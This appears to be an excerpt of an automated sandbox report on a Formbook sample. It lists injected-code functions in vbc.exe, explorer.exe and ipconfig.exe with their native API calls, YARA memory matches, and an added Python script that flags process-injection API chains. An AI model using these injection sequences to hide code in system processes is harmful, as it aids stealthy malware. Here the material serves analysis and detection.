          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B0048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B0060 NtQuerySection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B0078 NtResumeThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B10D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B01D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFAB8 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFAD0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AF8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AF938 NtWriteFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B1930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B0C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020B1D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_000981C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00098270 NtReadFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_000982F0 NtClose,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009817A NtCreateFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_000981BA NtCreateFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009826A NtReadFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E4632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E467C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E46332 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E467C2 NtQueryInformationProcess,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00407272
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00406A9B
          Source: C:\Users\Public\vbc.exeCode function: 4_2_72E31A98
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B808
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041A2AA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BBA8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C60
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BD28
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D8E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C785
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DE0C6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090D005
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E3040
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F905A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0095D06D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DE2E9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00981238
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009863BF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DF3CF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009063DB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E2305
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E7353
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092A37B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F1489
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00915485
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096443E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091D47D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009605E3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008FC5F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E351F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00926540
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E4680
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008EE6C1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092A634
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00982622
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096579A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008EC7BC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009157C3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0095F8C4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0097F8EE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008EC85C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090286D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0098098E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E29B2
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F69FE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00965955
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096394B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00993A83
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0098CBA4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096DBDA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFBD7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00907B00
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0097FDDD
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00910D3B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008ECD5B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00912E2F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008FEE4C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0097CFB1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00952FDC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F0F3F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090DF7C
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041A2AA
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C785
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B808
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041BBA8
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00408C60
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041BD28
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00402D8E
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00402FB0
          Source: C:\Windows\explorer.exeCode function: 6_2_029348F9
          Source: C:\Windows\explorer.exeCode function: 6_2_029372FF
          Source: C:\Windows\explorer.exeCode function: 6_2_02939062
          Source: C:\Windows\explorer.exeCode function: 6_2_0293B5B2
          Source: C:\Windows\explorer.exeCode function: 6_2_0293A7C7
          Source: C:\Windows\explorer.exeCode function: 6_2_02934902
          Source: C:\Windows\explorer.exeCode function: 6_2_02937302
          Source: C:\Windows\explorer.exeCode function: 6_2_02935362
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02161238
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020BE2E9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020C2305
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020C7353
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0210A37B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_021663BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020BF3CF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020E63DB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020ED005
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020C3040
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020D905A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0213D06D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020BE0C6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0210A634
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02162622
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020C4680
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020CE6C1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0214579A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020CC7BC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020F57C3
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0214443E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020FD47D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020D1489
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020F5485
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020C351F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02106540
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_021405E3
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020DC5F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02173A83
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020E7B00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0216CBA4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0214DBDA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020BFBD7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020CC85C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020E286D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0213F8C4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0215F8EE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02145955
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0214394B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0216098E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020C29B2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020D69FE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020F2E2F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020DEE4C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020D0F3F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020EDF7C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0215CFB1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02132FDC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020F0D3B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020CCD5B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0215FDDD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009A2AA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009C785
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00088C60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00082D8E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00082D90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00082FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E467C7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E45062
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E41362
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E43302
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E432FF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E475B2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E40902
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E408F9
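The two chains the report lists for code running inside ipconfig.exe (NtCreateSection followed by two NtMapViewOfSection calls, and NtQueryInformationProcess, RtlWow64SuspendThread, NtSetContextThread, NtQueueApcThread, NtResumeThread) are the primitives behind the section-mapping and APC/thread-context injection that the signature summary flags. The script below is an added example written for this page; it is not part of the report and not Joe Sandbox tooling. It parses "Code function" lines of the format shown above into records, matches ordered API chains against each function's call list, and flags any process under C:\Windows whose code references injection primitives, which is the tell that a signed utility such as ipconfig.exe is hosting foreign code. The reading of the "7_2_01E4632E" identifier as process index, dump index and function address, the chain definitions and the sample lines are assumptions constructed for the example. One caveat a practitioner should keep in mind: these entries come from cross-references in dumped code, so they show what the code can call, not what executed; corroborate with the behaviour entries further down.

```python
import re
from collections import defaultdict

# Constructed sample (not taken verbatim from the report): four "Code function" lines
# in the report's own format, one with the source path glued to the next cell the way
# the extracted page shows it. The parser accepts both spellings.
SAMPLE_LINES = r"""
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_01E4632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_01E467C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,
Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B808
""".strip().splitlines()

# "7_2_01E4632E" is read here as <process index>_<dump index>_<function address>.
# That reading of the report identifier is an assumption made for this example.
LINE_RE = re.compile(
    r"Source:\s*(?P<src>.+?)\s*\|?\s*Code function:\s*"
    r"(?P<proc>\d+)_(?P<dump>\d+)_(?P<addr>[0-9A-Fa-f]+)\s*(?P<apis>.*)$"
)

# Ordered API chains that together implement code injection. Chosen for this example;
# tune to your environment. Requiring NtMapViewOfSection twice separates the
# "map once locally, once into the target" pattern from ordinary loader activity.
INJECTION_CHAINS = {
    "section mapped twice (local view + remote view)":
        ["NtCreateSection", "NtMapViewOfSection", "NtMapViewOfSection"],
    "thread context hijack with a queued APC":
        ["NtSetContextThread", "NtQueueApcThread", "NtResumeThread"],
}

# Primitives a signed Windows utility's own code would not call; seeing them in its
# process means code that is not the utility's is running there.
INJECTION_PRIMITIVES = {
    "NtQueueApcThread", "NtSetContextThread", "NtWriteVirtualMemory",
    "NtUnmapViewOfSection", "NtCreateProcessEx",
}


def parse_code_function_lines(lines):
    """Turn report lines into dicts; lines that are not 'Code function' entries are skipped."""
    records = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        apis = [a.strip() for a in m.group("apis").split(",") if a.strip()]
        records.append({
            "source": m.group("src"),
            "proc": int(m.group("proc")),
            "dump": int(m.group("dump")),
            "addr": int(m.group("addr"), 16),
            "apis": apis,
        })
    return records


def is_subsequence(needle, haystack):
    """True if every element of needle occurs in haystack in order (gaps allowed)."""
    it = iter(haystack)
    return all(any(api == n for api in it) for n in needle)


def find_injection_chains(records):
    """(source, function id, chain name) for every function whose calls contain a chain."""
    hits = []
    for rec in records:
        fn_id = f'{rec["proc"]}_{rec["dump"]}_{rec["addr"]:08X}'
        for name, chain in INJECTION_CHAINS.items():
            if is_subsequence(chain, rec["apis"]):
                hits.append((rec["source"], fn_id, name))
    return hits


def injected_system_processes(records):
    """Processes under C:\\Windows whose dumped code references injection primitives."""
    by_src = defaultdict(set)
    for rec in records:
        by_src[rec["source"]].update(rec["apis"])
    return sorted(src for src, apis in by_src.items()
                  if src.lower().startswith("c:\\windows\\") and apis & INJECTION_PRIMITIVES)


if __name__ == "__main__":
    recs = parse_code_function_lines(SAMPLE_LINES)
    for src, fn_id, name in find_injection_chains(recs):
        print(f"{src} {fn_id}: {name}")
    for src in injected_system_processes(recs):
        print(f"system binary hosting injection primitives: {src}")
```

Feed the whole "Code function" listing of a report to parse_code_function_lines to get the same triage over every dumped function; the subsequence match tolerates extra calls between the chain members, which is what makes it robust to the LdrInitializeThunk and NtClose noise seen above.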
Source: QTN3C2AF414EDF9_041873.xlsx | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: String function: 020BE2A8 appears 38 times
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: String function: 0212F970 appears 84 times
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: String function: 02103F92 appears 132 times
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: String function: 0210373B appears 245 times
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: String function: 020BDF5C appears 121 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 00419F70 appears 40 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 008DE2A8 appears 38 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 0041A0A0 appears 38 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 00923F92 appears 132 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 008DDF5C appears 122 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 0094F970 appears 84 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 0092373B appears 245 times
Source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
